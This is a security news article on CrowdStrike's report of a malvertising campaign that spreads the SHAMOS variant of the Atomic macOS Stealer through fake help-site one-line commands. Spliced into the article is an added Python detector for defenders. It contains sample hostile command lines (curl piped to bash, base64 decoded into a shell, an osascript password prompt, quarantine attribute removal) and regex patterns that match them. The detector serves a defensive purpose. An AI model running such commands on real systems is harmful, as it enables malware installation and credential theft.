
Hundreds Targeted in New Atomic macOS Stealer Campaign

Between June and August, over 300 entities were targeted with the Atomic macOS Stealer via malvertising.


CrowdStrike warns of a spike in attacks aimed at infecting macOS users with a variant of the infamous Atomic macOS Stealer (AMOS) information stealer.

Between June and August, the cybercrime group Cookie Spider, which operates the AMOS malware-as-a-service (MaaS) enterprise, used malvertising to direct victims to fraudulent macOS help websites and trick them into installing the malware.

The campaign, CrowdStrike says, targeted users searching for solutions to common macOS issues. It relied on promoted search advertisements pointing to fraudulent help websites, where victims were instructed to paste and run a malicious one-line command on their systems.

The command fetched a Bash script from a remote server; the script captured the victim's password and then downloaded an executable from a second remote location.

Dubbed SHAMOS, the payload is an AMOS variant that includes anti-VM checks to avoid running inside analysis sandboxes and virtual machines, and that performs reconnaissance and data collection on the host.

The malware searches the system for files containing credentials, along with Keychain data, Apple Notes, browser data, and known cryptocurrency wallets, packs the collected data into a ZIP archive, and attempts to exfiltrate it to a remote server.


Additionally, SHAMOS can download and execute payloads, including a botnet module and a fake Ledger Live wallet application.

The malvertising campaign targeted users in Canada, China, Colombia, Italy, Japan, Mexico, the US, the UK, and other countries, but was not served to Russian users.

CrowdStrike’s investigation revealed that the cybercriminals likely impersonated a legitimate Australia-based electronics store in their Google Advertising profile.

“This campaign underscores the popularity of malicious one-line installation commands among eCrime actors. This technique allows them to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices,” CrowdStrike notes.
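The Gatekeeper bypass CrowdStrike describes works because a file fetched with curl from a shell never receives the com.apple.quarantine extended attribute that browser downloads get, so Gatekeeper is never asked to evaluate it. The following is an added example, not code from CrowdStrike's report or from the SecurityWeek article, of how a defender might hunt for this one-line installer shape in process command-line or shell-history telemetry. The sample command lines are constructed for the example, and the rule names and regular expressions are assumptions about typical indicators of this technique (remote script piped to a shell, base64-decoded content piped to a shell, osascript password prompts, quarantine attribute removal, executables staged in /tmp); they are not indicators published for this campaign.

```python
import re
from typing import List, Pattern, Tuple

# Constructed sample of process command lines, in the shape an EDR or a
# shell-history collector would record them. None of these are real
# telemetry from the SHAMOS campaign; the base64 blob decodes to "echo hi".
SAMPLE_COMMANDS = [
    "brew install wget",
    "curl -fsSL https://help.example.test/fix.sh | bash",
    "echo ZWNobyBoaQ== | base64 -d | bash",
    "osascript -e 'display dialog \"macOS needs your password\" "
    "default answer \"\" with hidden answer'",
    "xattr -d com.apple.quarantine /private/tmp/helper",
    "chmod +x /private/tmp/helper && /private/tmp/helper",
    "curl -O https://example.test/notes.tar.gz",
    "git pull origin main",
]

# (rule name, pattern). Each pattern is an assumed indicator, written to
# match the installer shape described in the article, not a vendor signature.
RULES: List[Tuple[str, Pattern[str]]] = [
    ("remote script piped to shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("base64-decoded content piped to shell",
     re.compile(r"base64\s+(-d|--decode|-D)\s*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("AppleScript password prompt",
     re.compile(r"\bosascript\b.*hidden answer")),
    ("quarantine attribute removed (Gatekeeper bypass)",
     re.compile(r"\bxattr\b.*(-d\s+com\.apple\.quarantine|\s-c\b)")),
    ("executable made runnable in temp dir",
     re.compile(r"chmod\s+\+x\s+(/private)?/tmp/")),
]

# Rules that, on their own, mean "something executed code it just fetched".
EXEC_RULES = {"remote script piped to shell",
              "base64-decoded content piped to shell"}
# Rules that follow the fetch in the described chain: credential prompt,
# then staging and running the Mach-O without Gatekeeper evaluation.
FOLLOWUP_RULES = {"AppleScript password prompt",
                  "quarantine attribute removed (Gatekeeper bypass)",
                  "executable made runnable in temp dir"}


def scan(commands: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (index, command, [matched rule names]) for each suspicious command."""
    hits = []
    for i, cmd in enumerate(commands):
        reasons = [name for name, rx in RULES if rx.search(cmd)]
        if reasons:
            hits.append((i, cmd, reasons))
    return hits


def chain_detected(commands: List[str], window: int = 5) -> bool:
    """True when a fetch-and-execute command is followed, within `window`
    subsequent commands, by a password prompt, quarantine removal or a
    temp-dir executable: the shape of the one-line installer chain."""
    hits = scan(commands)
    for idx, _, reasons in hits:
        if not EXEC_RULES & set(reasons):
            continue
        for later_idx, _, later_reasons in hits:
            if idx < later_idx <= idx + window and FOLLOWUP_RULES & set(later_reasons):
                return True
    return False


if __name__ == "__main__":
    for idx, cmd, reasons in scan(SAMPLE_COMMANDS):
        print(f"[{idx}] {cmd}\n      -> {', '.join(reasons)}")
    print("installer chain detected:", chain_detected(SAMPLE_COMMANDS))
```

Single-command hits are noisy on developer machines (Homebrew's own installer is a curl-to-bash one-liner), which is why chain_detected keys on the sequence the article describes rather than on any one command; in practice the window would be scoped per user session or per parent process rather than by list position.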

Related: Homebrew macOS Users Targeted With Information Stealer Malware

Related: High-Value NPM Developers Compromised in New Phishing Campaign

Related: North Korean Hackers Target macOS Users

Related: Digium Phones Targeted in Cybercrime Campaign Aimed at VoIP Systems


Copyright © 2026 SecurityWeek ®, a Wired Business Media Publication. All Rights Reserved.
